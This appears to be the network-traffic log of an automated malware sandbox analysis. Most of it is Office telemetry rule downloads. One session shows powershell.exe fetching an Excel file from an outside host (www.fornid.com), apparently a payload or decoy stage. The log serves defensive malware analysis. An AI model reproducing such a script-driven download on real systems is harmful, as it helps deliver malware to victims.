                                                                                                              2024-12-05 09:38:36 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:36 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:36 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 472
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                              ETag: "0x8DC582BB650C2EC"
                                                                                                              x-ms-request-id: 5cfda45f-901e-00ac-3dce-45b69e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093836Z-1746fd949bd4w8sthC1EWR7004000000026g000000008ck9
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:36 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              56192.168.2.64978813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:36 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:36 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:36 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 419
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                              ETag: "0x8DC582B9FF95F80"
                                                                                                              x-ms-request-id: 901a75be-701e-0053-76cb-453a0a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093836Z-1746fd949bddgsvjhC1EWRum2c00000002tg0000000040bm
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              57192.168.2.64978993.95.216.175443416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:36 UTC195OUTGET /ab/List%20of%20required%20items.xlsx HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                              Host: www.fornid.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-05 09:38:37 UTC347INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:36 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Tue, 03 Dec 2024 04:19:39 GMT
                                                                                                              ETag: "20426a6-1fa6-62855f93d23a9"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 8102
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
                                                                                                              2024-12-05 09:38:37 UTC7845INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 62 ee 9d 68 5e 01 00 00 90 04 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: PK!bh^[Content_Types].xml (
                                                                                                              2024-12-05 09:38:37 UTC257INData Raw: d3 85 02 00 00 b1 05 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 00 78 6c 2f 73 74 79 6c 65 73 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 0e ea cc 7e 10 02 00 00 a2 05 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 96 15 00 00 78 6c 2f 77 6f 72 6b 73 68 65 65 74 73 2f 73 68 65 65 74 31 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 a7 0a e4 bd 3d 01 00 00 57 02 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 17 00 00 64 6f 63 50 72 6f 70 73 2f 63 6f 72 65 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 de 41 16 d9 8a 01 00 00 11 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 50 1a 00 00 64 6f 63 50 72 6f 70 73 2f 61 70 70 2e 78 6d 6c 50 4b 05 06 00 00 00 00 0a 00 0a 00 80 02 00 00 10 1d 00 00
                                                                                                              Data Ascii: xl/styles.xmlPK-!~xl/worksheets/sheet1.xmlPK-!=WdocProps/core.xmlPK-!APdocProps/app.xmlPK


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              58192.168.2.64979013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:37 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:38 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:38 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 468
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                              ETag: "0x8DC582BB3EAF226"
                                                                                                              x-ms-request-id: bac86282-701e-0050-11f2-466767000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093838Z-1746fd949bdjrnwqhC1EWRpg2800000002n0000000002pdv
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:38 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              59192.168.2.64979413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:38 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:38 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:38 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 470
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                              ETag: "0x8DC582BBB181F65"
                                                                                                              x-ms-request-id: 8c60988c-801e-00a3-08c1-457cfb000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093838Z-1746fd949bdwt8wrhC1EWRu6rg00000002ng000000005htb
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:38 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              60192.168.2.64979213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:38 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:38 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:38 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 411
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                              ETag: "0x8DC582B989AF051"
                                                                                                              x-ms-request-id: f6fadb53-501e-0064-5acb-451f54000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093838Z-1746fd949bd7wvgbhC1EWR0rgs00000002mg000000002srg
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:38 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              61192.168.2.64979313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:38 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:38 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:38 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 427
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                              ETag: "0x8DC582BB556A907"
                                                                                                              x-ms-request-id: 1a0f4f93-001e-0049-61cb-455bd5000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093838Z-1746fd949bd7wvgbhC1EWR0rgs00000002kg0000000048vh
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              62192.168.2.64979113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:38 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:38 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:38 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 485
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                              ETag: "0x8DC582BB9769355"
                                                                                                              x-ms-request-id: 9e061bd1-d01e-0066-12ef-46ea17000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093838Z-1746fd949bdzd2qvhC1EWRcygw00000002ag000000001y9b
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:38 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              63192.168.2.64979513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:40 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:40 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:40 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 502
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                              ETag: "0x8DC582BB6A0D312"
                                                                                                              x-ms-request-id: b51b559c-801e-008c-7fcc-457130000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093840Z-1746fd949bd9x4mhhC1EWRb76n00000002ng000000001gwu
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:40 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              64192.168.2.64979613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:40 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:41 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:40 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 474
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                              ETag: "0x8DC582BB3F48DAE"
                                                                                                              x-ms-request-id: 859db5fc-901e-005b-23cb-452005000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093840Z-1746fd949bdjrnwqhC1EWRpg2800000002mg0000000048sh
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:41 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              65192.168.2.64979713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:40 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:41 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:40 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 408
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                              ETag: "0x8DC582BB9B6040B"
                                                                                                              x-ms-request-id: 68175a90-d01e-0065-3ed1-45b77a000000
                                                                                                              x-ms-version: 2018-03-28
